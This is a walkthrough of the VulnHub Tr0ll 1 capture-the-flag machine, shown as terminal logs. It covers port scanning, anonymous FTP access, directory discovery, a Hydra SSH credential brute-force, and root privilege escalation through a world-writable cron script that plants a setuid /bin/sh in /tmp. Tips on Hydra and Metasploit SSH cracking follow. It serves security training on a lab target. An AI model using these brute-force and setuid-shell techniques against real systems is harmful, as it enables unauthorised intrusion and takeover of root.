| [Download]: http://vulnhub.com/entry/tr0ll-1,100/ |
| [email protected]:~$ nmap -n -sV 192.168.108.0/24 Starting Nmap 6.47 ( http://nmap.org ) at 2014-09-12 01:50 EDT Nmap scan report for 192.168.108.1 Host is up (0.0019s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Dynamode/Motorola WAP http config Service Info: Device: WAP Nmap scan report for 192.168.108.193 Host is up (0.00041s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Nmap scan report for 192.168.108.194 Host is up (0.0027s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 22/tcp open ssh (protocol 2.0) 80/tcp open http Apache httpd 2.4.7 ((Ubuntu)) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : SF-Port22-TCP:V=6.47%I=7%D=9/12%Time=54128998%P=x86_64-unknown-linux-gnu%r SF:(NULL,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n"); Service Info: OS: Unix Nmap scan report for 192.168.108.197 Host is up (0.00026s latency). All 1000 scanned ports on 192.168.108.197 are closed Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 256 IP addresses (4 hosts up) scanned in 18.53 seconds |
| ftp> open 192.168.108.194 Connected to 192.168.108.194. 220 (vsFTPd 3.0.2) Name (192.168.108.194:offensive):anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> passive Passive mode on. ftp> ls 227 Entering Passive Mode(192,168,108,194,58,86). 150 Here comes the directory listing. -rwxrwxrwx 1 1000 0 8068 Aug 10 00:43 lol.pcap 226 Directory send OK. ftp> get lol.pcap local: lol.pcap remote: lol.pcap 227 Entering Passive Mode(192,168,108,194,223,49). 150 Opening BINARY mode dataconnection for lol.pcap (8068 bytes). 226 Transfer complete. 8068 bytes received in 0.00 secs(4746.3 kB/s) ftp> quit 221 Goodbye. |
| [email protected]:~$ stringslol.pcap Linux 3.12-kali1-486 Dumpcap 1.10.2 (SVN Rev 51934 from/trunk-1.10) eth0 host 10.0.0.6 Linux 3.12-kali1-486 220 (vsFTPd 3.0.2) "USER anonymous 331 Please specify the password. PASS password 230 Login successful. SYST 215 UNIX Type: L8 PORT 10,0,0,12,173,198 200 PORT command successful.Consider using PASV. LIST 150 Here comes the directorylisting. -rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt 226 Directory send OK. TYPE I W200 Switching to Binary mode. PORT 10,0,0,12,202,172 g> @ W200 PORT command successful.Consider using PASV. RETR secret_stuff.txt W150 Opening BINARY mode dataconnection for secret_stuff.txt (147 bytes). WWell, well, well, aren't you just aclever little devil, you almost found thesup3rs3cr3tdirlol :-P Sucks, you were so close... gottaTRY HARDER! W226 Transfer complete. TYPE A O200 Switching to ASCII mode. {PORT 10,0,0,12,172,74 O200 PORT command successful.Consider using PASV. {LIST O150 Here comes the directorylisting. O-rw-r--r-- 1 0 0 147 Aug 10 00:38 secret_stuff.txt O226 Directory send OK.> {QUIT 221 Goodbye. Counters provided by dumpcap |
| http://192.168.108.194/ http://192.168.108.194/robots.txt http://192.168.108.194/sup3rs3cr3tdirlol/ http://192.168.108.194/sup3rs3cr3tdirlol/roflmao |
| [email protected]:~$ exiftoolroflmao ExifTool Version Number :8.60 File Name :roflmao Directory : . File Size :7.1 kB File Modification Date/Time :2014:09:11 23:02:06-04:00 File Permissions :rw-r--r-- File Type :ELF executable MIME Type :application/octet-stream CPU Architecture : 32bit CPU Byte Order :Little endian Object File Type :Executable file CPU Type : i386 |
| [email protected]:~$ strings roflmao /lib/ld-linux.so.2 libc.so.6 _IO_stdin_used printf __libc_start_main __gmon_start__ GLIBC_2.0 PTRh [^_] Find address 0x0856BF to proceed ;*2$" |
| http://192.168.108.194/0x0856BF/ http://192.168.108.194/0x0856BF/good_luck/which_one_lol.txt http://192.168.108.194/0x0856BF/this_folder_contains_the_password/Pass.txt |
| [email protected]:~$ cat which_one_lol.txt maleus ps-aux felux Eagle11 genphlux < -- Definitely not thisone usmc8892 blawrg wytshadow vis1t0r overflow [email protected]:~$ cat Pass.txt Good_job_:) |
| [email protected]:~$ hydra -F -V -Lwhich_one_lol.txt -p Pass.txt -S 192.168.108.194 ssh Hydra v8.0 (c) 2014 by vanHauser/THC & David Maciejak - Please do not use in military orsecret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra)starting at 2014-09-12 01:21:31 [WARNING] Many SSH configurationslimit the number of parallel tasks, it is recommended to reducethe tasks: use -t 4 [DATA] max 10 tasks per 1 server,overall 10 tasks, 10 login tries (l:10/p:1), ~0 tries per task[DATA] attacking service ssh on port22 [ATTEMPT] target 192.168.108.194 -login "maleus" - pass "Pass.txt" - 1 of 10[child 0] [ATTEMPT] target 192.168.108.194 -login "ps-aux" - pass "Pass.txt" - 2 of 10[child 1] [ATTEMPT] target 192.168.108.194 -login "felux" - pass "Pass.txt" - 3 of 10[child 2][ATTEMPT] target 192.168.108.194 -login "Eagle11" - pass "Pass.txt" - 4 of 10[child 3][ATTEMPT] target 192.168.108.194 -login "genphlux < -- Definitely not this one" - pass"Pass.txt" - 5 of 10 [child 4] [ATTEMPT] target 192.168.108.194 -login "usmc8892" - pass "Pass.txt" - 6 of 10[child 5] [ATTEMPT] target 192.168.108.194 -login "blawrg" - pass "Pass.txt" - 7 of 10[child 6] [ATTEMPT] target 192.168.108.194 -login "wytshadow" - pass "Pass.txt" - 8 of 10[child 7] [ATTEMPT] target 192.168.108.194 -login "vis1t0r" - pass "Pass.txt" - 9 of 10[child 8] [ATTEMPT] target 192.168.108.194 -login "overflow" - pass "Pass.txt" - 10 of 10[child 9] [RE-ATTEMPT] target 192.168.108.194- login "wytshadow" - pass "Pass.txt" - 10 of10 [child 7] [22][ssh]host:192.168.108.194 login:overflow password:Pass.txt [STATUS] attack finished for192.168.108.194 (valid pair found) 1 of 1 target successfullycompleted, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2014-09-1201:21:32 |
| $ find / -type f -perm -0002 -print2>/dev/null | grep -v "/proc/" /srv/ftp/lol.pcap /var/tmp/cleaner.py.swp /var/www/html/sup3rs3cr3tdirlol/roflmao /var/log/cronlog /sys/fs/cgroup/systemd/user/1002.user/10.session/cgroup.event_control /sys/fs/cgroup/systemd/user/1002.user/cgroup.event_control /sys/fs/cgroup/systemd/user/cgroup.event_control /sys/fs/cgroup/systemd/cgroup.event_control /sys/kernel/security/apparmor/.access /lib/log/cleaner.py |
| $ ls -l /lib/log/cleaner.py -rwxrwxrwx 1 root root 185 Sep 1120:57 /lib/log/cleaner.py $ cat /lib/log/cleaner.py #!/usr/bin/env python import os import sys try: os.system('rm -r /tmp/* ') os.system('cp /bin/sh/tmp/sh && chown root:root /tmp/sh && chmod 4775/tmp/sh') except: sys.exit() |
| $ ls -l /tmp/ total 112 -rwsrwxr-x 1 root root 112204 Sep 1122:28 sh $ /tmp/sh # id uid=1002(overflow) gid=1002(overflow) euid=0(root)groups=0(root),1002(overflow) |
| $ /tmp/sh # ls /root proof.txt # cat /root/proof.txt Good job, you did it! 702a8c18d29c6f3ca0d99ef5712bfbdc |
Tips:
1. How to crack ssh/ftp ? (metasploit/hydra), Please Compare them.
Metasploit SSH crack
-- use auxiliary/scanner/ssh/ssh_login
Hydra: (Please write with a strict syntax, no left spaces)
-- hydra -F -V -L user.txt -P pass.txt 192.168.1.100 -S ssh
2. How to compile hydra by yourself,
3. Linux Privilege
![linux-svn解除安裝與安裝[圖]](data:image/gif;base64,R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=)